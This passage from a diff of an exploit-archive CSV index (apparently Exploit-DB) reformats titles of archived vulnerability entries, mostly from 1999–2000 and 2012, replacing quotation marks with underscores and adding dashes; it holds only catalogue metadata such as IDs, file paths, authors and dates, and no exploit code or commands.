Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 @@ -16815,7 +16815,7 @@ id,file,description,date,author,platform,type,port 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS Vulnerability",1999-08-08,rpc,multiple,dos,0 19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2) Vulnerability",1999-08-09,"Ross Harvey",multiple,local,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 -19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 +19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R _Topic_ Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0 19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE_Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 @@ -16833,7 +16833,7 @@ id,file,description,date,author,platform,type,port 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability",1999-08-23,"Michal Zalewski",linux,local,0 -19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX _Object for constructing type libraries for scriptlets_ Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",1999-08-25,jbowie,linux,local,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 @@ -16852,7 +16852,7 @@ id,file,description,date,author,platform,type,port 19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 +19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX _Eyedog_ Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 @@ -16893,7 +16893,7 @@ id,file,description,date,author,platform,type,port 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0 19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 -19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail -m Local Buffer Overflow Vulnerability",1999-09-12,"Brock Tellier",solaris,local,0 +19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail -m - Local Buffer Overflow Vulnerability",1999-09-12,"Brock Tellier",solaris,local,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5.0 Download Behavior Vulnerability",1999-09-27,"Georgi Guninski",windows,remote,0 19531,platforms/hardware/remote/19531.txt,"Cisco IOS <= 12.0.2 Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 19532,platforms/aix/remote/19532.pl,"IBM AIX <= 4.3.2 ftpd Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 @@ -16926,7 +16926,7 @@ id,file,description,date,author,platform,type,port 19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 Javascript URL Redirection Vulnerability",1999-10-18,"Georgi Guninski",windows,remote,0 19560,platforms/multiple/remote/19560.c,"Washington University wu-ftpd 2.5.0 - message Buffer Overflow Vulnerability",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 -19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - ""Server ID"" Buffer Overflow Vulnerability",1999-09-30,"Per Bergehed",windows,dos,0 +19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - _Server ID_ Buffer Overflow Vulnerability",1999-09-30,"Per Bergehed",windows,dos,0 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service Vulnerability",1999-10-21,MSG.Net,bsd,dos,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities",1999-10-22,"Brock Tellier",linux,local,0 @@ -16937,7 +16937,7 @@ id,file,description,date,author,platform,type,port 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability (2)",1999-11-04,"Alberto Solino",windows,remote,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS Vulnerability",1999-10-28,"Nobuo Miwa",multiple,dos,0 19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 -19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware <= 8.3 - ""unserialize()"" PHP Code Execution",2012-07-04,EgiX,php,webapps,0 +19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware <= 8.3 - _unserialize()_ PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".Net Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,metasploit,windows,remote,0 @@ -17028,10 +17028,10 @@ id,file,description,date,author,platform,type,port 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink Vulnerability",1999-12-03,"Brock Tellier",sco,local,0 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 -19662,platforms/windows/remote/19662.txt,"Internet Explorer 4.1/5.0/4.0.1 Subframe Spoofing Vulnerability",1999-11-30,"Georgi Guninski",windows,remote,0 +19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing Vulnerability",1999-11-30,"Georgi Guninski",windows,remote,0 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop (print_domain_name) Buffer Overflow Vulnerability",1999-12-07,K2,solaris,remote,0 19664,platforms/windows/remote/19664.txt,"Cat Soft Serv-U 2.5 a Server SITE PASS DoS Vulnerability",1999-12-02,"Ussr Labs",windows,remote,0 -19665,platforms/windows/local/19665.txt,"Internet Explorer 5.0 vnd.ms.radio URL Vulnerability",1999-12-06,"Jeremy Kothe",windows,local,0 +19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5.0 - vnd.ms.radio URL Vulnerability",1999-12-06,"Jeremy Kothe",windows,local,0 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 DoS Vulnerability",1999-12-06,"Ussr Labs",windows,dos,0 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow Vulnerability",1999-12-09,"Amanda Woodward",multiple,remote,0 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 @@ -17073,7 +17073,7 @@ id,file,description,date,author,platform,type,port 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Vulnerability (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Vulnerability (2)",2000-03-15,"Elias Levy",linux,local,0 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS Vulnerability",2000-01-05,"Ussr Labs",windows,dos,0 -19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 CFCACHE Vulnerability",2000-01-04,anonymous,multiple,remote,0 +19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE Vulnerability",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal Vulnerability",2000-01-03,"k0ad k1d",cgi,remote,0 19714,platforms/php/webapps/19714.txt,"Netsweeper WebAdmin Portal Multiple Vulnerabilities",2012-07-10,"Jacob Holcomb",php,webapps,0 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 @@ -17158,7 +17158,7 @@ id,file,description,date,author,platform,type,port 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read Vulnerability",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 User Shell Folders Vulnerability",2000-03-09,anonymous,windows,local,0 19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 -19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0_Cisco PIX Firewall 4.x/5.x ""ALG"" Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 +19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0_Cisco PIX Firewall 4.x/5.x _ALG_ Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow Vulnerability",2000-03-10,bladi,linux,remote,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (1)",2000-03-11,Krahmer,linux,local,0 19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow Vulnerability (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 @@ -17227,16 +17227,16 @@ id,file,description,date,author,platform,type,port 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow Vulnerability",2000-04-23,"Andrew Hobgood",linux,remote,0 -19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0_RedHat imap 4.5 -4_UoW imap 4.5 popd Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 +19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0_ RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 19870,platforms/linux/local/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,local,0 19871,platforms/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall Port 67 Vulnerability",2000-04-24,"Wally Whacker",windows,remote,0 -19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (1)",2000-04-24,DiGiT,solaris,local,0 -19873,platforms/solaris/local/19873.c,"Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 -19874,platforms/solaris/local/19874.c,"Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 +19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (1)",2000-04-24,DiGiT,solaris,local,0 +19873,platforms/solaris/local/19873.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 +19874,platforms/solaris/local/19874.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19875,platforms/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 Cleartext Passwords Vulnerability",2000-04-23,"Robert van der Meulen",immunix,local,0 19876,platforms/solaris/local/19876.c,"Solaris 7.0/8 Xsun Buffer Overrun Vulnerability",2000-04-24,DiGiT,solaris,local,0 19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0_Personal Web Server 2.0 htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 -19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 lp -d Option Buffer Overflow Vulnerability",2000-04-24,DiGiT,solaris,local,0 +19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow Vulnerability",2000-04-24,DiGiT,solaris,local,0 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package Default Account and Password Vulnerability",2000-04-24,"Max Vision",linux,remote,0 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 Port Scan DoS Vulnerability",2000-04-25,Vacuum,windows,dos,0 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password Vulnerability",2000-04-27,"Cerberus Security Team",windows,remote,0 @@ -17276,7 +17276,7 @@ id,file,description,date,author,platform,type,port 19919,platforms/hardware/remote/19919.c,"Cisco 7xx Series Router DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,remote,0 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 -19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 +19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 19923,platforms/hardware/remote/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 DoS Vulnerability",2000-05-17,cassius,hardware,remote,0 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 @@ -17286,12 +17286,12 @@ id,file,description,date,author,platform,type,port 19965,platforms/multiple/remote/19965.txt,"HP JetAdmin 6.0 Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,remote,0 19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 -19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 -Buffer Overflow",2012-07-19,metasploit,windows,remote,998 +19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel - Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0 -19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0 +19939,platforms/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0 19940,platforms/windows/dos/19940.c,"Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (1)",2000-05-18,"rain forest puppy",windows,dos,0 19941,platforms/windows/dos/19941.casl,"Axent NetProwler 3.0 Malformed IP Packets DoS Vulnerability (2)",2000-05-18,"Pedro Quintanilha",windows,dos,0 19942,platforms/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration Vulnerability",1999-12-26,anonymous,windows,remote,0 @@ -17343,7 +17343,7 @@ id,file,description,date,author,platform,type,port 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A Mailclient Temporary Link Vulnerability",2000-06-06,"Gert Fokkema",windows,local,0 19994,platforms/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 Fragmented Packets DoS",2000-05-23,phonix,windows,dos,0 19995,platforms/cgi/remote/19995.txt,"Michael Lamont Savant WebServer 2.1 CGI Source Code Disclosure",2000-06-05,Drew,cgi,remote,0 -19996,platforms/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x Administrator Login Password DoS Vulnerability",2000-06-07,"Stuart McClure",multiple,dos,0 +19996,platforms/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x - Administrator Login Password DoS Vulnerability",2000-06-07,"Stuart McClure",multiple,dos,0 19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 Logging Buffer Overflow Vulnerability",2000-05-10,Wizdumb,windows,remote,0 19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow Vulnerability",2000-06-12,"Michal Zalewski",linux,remote,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 BRUEXECLOG Environment Variable Vulnerability",2000-06-05,"Riley Hassell",multiple,local,0 @@ -17365,7 +17365,7 @@ id,file,description,date,author,platform,type,port 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS",2000-06-16,Prizm,windows,dos,0 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 20018,platforms/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 File Permission Vulnerability",2000-06-16,"Dixie Flatline",solaris,local,0 -20019,platforms/windows/remote/20019.txt,"Cart32 3.0 - ""expdate"" Administrative Information Disclosure Vulnerability",2000-05-03,cassius,windows,remote,0 +20019,platforms/windows/remote/20019.txt,"Cart32 3.0 - _expdate_ Administrative Information Disclosure Vulnerability",2000-05-03,cassius,windows,remote,0 20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL DoS Vulnerability",2000-06-16,Craig,windows,dos,0 20021,platforms/linux/local/20021.txt,"RedHat 6.2 Piranha Virtual Server Package Plaintext Password Vulnerability",2000-06-09,arkth,linux,local,0 20022,platforms/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local,0 @@ -17388,7 +17388,7 @@ id,file,description,date,author,platform,type,port 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow Vulnerability",2000-06-27,UNYUN,windows,remote,0 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 File Access Vulnerability",2000-06-26,"Larry W. Cashdollar",cgi,remote,0 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability",2000-06-26,"Larry W. Cashdollar",unix,local,0 -20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - ""SUMMON"" Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0 +20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0 @@ -17404,7 +17404,7 @@ id,file,description,date,author,platform,type,port 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 Password File Vulnerability (1)",2000-06-16,pbw,unix,local,0 20058,platforms/unix/local/20058.pl,"Visible Systems Razor 4.1 Password File Vulnerability (2)",2000-06-15,"Shawn A. Clifford",unix,local,0 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0 -20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - ""/INVITE"" Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0 +20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0 20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0 20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0 @@ -17417,7 +17417,7 @@ id,file,description,date,author,platform,type,port 20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal Vulnerability",2000-07-12,"Rikard Carlsson",windows,remote,0 20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability",2000-03-10,"Charles Chear",cgi,dos,0 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 SMDR.NLM Denial of Service Vulnerability",2000-07-11,"Dimuthu Parussalla",novell,dos,0 -20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 insecure perl ""open"" Vulnerability",2000-07-12,"Joey Hess",unix,local,0 +20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 insecure perl _open_ Vulnerability",2000-07-12,"Joey Hess",unix,local,0 20074,platforms/windows/remote/20074.java,"Infopulse GateKeeper 3.5 - Buffer Overflow Vulnerability",2000-07-13,Wizdumb,windows,remote,0 20075,platforms/linux/remote/20075.c,"Conectiva 4.x/5.x_Debian 2.x_RedHat 6.x_S.u.S.E 6.x/7.0_Trustix 1.x rpc.statd Remote Format String (1)",2000-07-16,drow,linux,remote,0 20076,platforms/linux/remote/20076.c,"Conectiva 4.x/5.x_Debian 2.x_RedHat 6.x_S.u.S.E 6.x/7.0_Trustix 1.x rpc.statd Remote Format String (2)",2000-08-01,Doing,linux,remote,0 @@ -17466,7 +17466,7 @@ id,file,description,date,author,platform,type,port 20128,platforms/irix/local/20128.c,"IRIX 6.5.x dmplay Buffer Overflow Vulnerability",2000-08-02,"Last Stage of Delirium",irix,local,0 20129,platforms/irix/local/20129.c,"IRIX 6.2/6.3 lpstat Buffer Overflow Vulnerability",1998-11-01,"Last Stage of Delirium",irix,local,0 20130,platforms/irix/local/20130.c,"IRIX 6.5.x inpview Race Condition Vulnerability",2000-01-01,"Last Stage of Delirium",irix,local,0 -20131,platforms/multiple/remote/20131.txt,"Apache Tomcat 3.1 Path Revealing Vulnerability",2000-07-20,"ET LoWNOISE",multiple,remote,0 +20131,platforms/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing Vulnerability",2000-07-20,"ET LoWNOISE",multiple,remote,0 20132,platforms/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet Information Disclosure Vulnerability",2000-07-20,"ET LoWNOISE",multiple,remote,0 20133,platforms/windows/local/20133.cpp,"Microsoft Windows 2000 Named Pipes Predictability Vulnerability",2000-08-01,Maceo,windows,local,0 20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow Vulnerability",2000-08-02,juliano,windows,remote,0 @@ -17485,8 +17485,8 @@ id,file,description,date,author,platform,type,port 20148,platforms/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow Vulnerability",2000-08-10,Zan,windows,remote,0 20149,platforms/irix/remote/20149.c,"IRIX 5.2/5.3/6.x telnetd Environment Variable Format String Vulnerability",2000-07-01,"Last Stage of Delirium",irix,remote,0 20150,platforms/unix/remote/20150.c,"Luca Deri ntop 1.2 a7-9/1.3.1 - Buffer Overflow Vulnerability",2000-08-14,anonymous,unix,remote,0 -20151,platforms/windows/remote/20151.pl,"Microsoft IIS 5.0 - ""Translate: f"" Source Disclosure Vulnerability (1)",2000-08-14,smiler,windows,remote,0 -20152,platforms/windows/remote/20152.pl,"Microsoft IIS 5.0 - ""Translate: f"" Source Disclosure Vulnerability (2)",2000-08-14,"Roelof Temmingh",windows,remote,0 +20151,platforms/windows/remote/20151.pl,"Microsoft IIS 5.0 - _Translate: f_ Source Disclosure Vulnerability (1)",2000-08-14,smiler,windows,remote,0 +20152,platforms/windows/remote/20152.pl,"Microsoft IIS 5.0 - _Translate: f_ Source Disclosure Vulnerability (2)",2000-08-14,"Roelof Temmingh",windows,remote,0 20153,platforms/unix/local/20153.c,"David Bagley xlock 4.16 User Supplied Format String Vulnerability (1)",2000-08-15,noir,unix,local,0 20154,platforms/unix/local/20154.c,"David Bagley xlock 4.16 User Supplied Format String Vulnerability (2)",2000-10-21,"Ben Williams",unix,local,0 20155,platforms/linux/local/20155.txt,"Multisoft FlagShip 4.4 Installation Permission Vulnerability",2000-08-10,Narrow,linux,local,0 @@ -17521,7 +17521,7 @@ id,file,description,date,author,platform,type,port 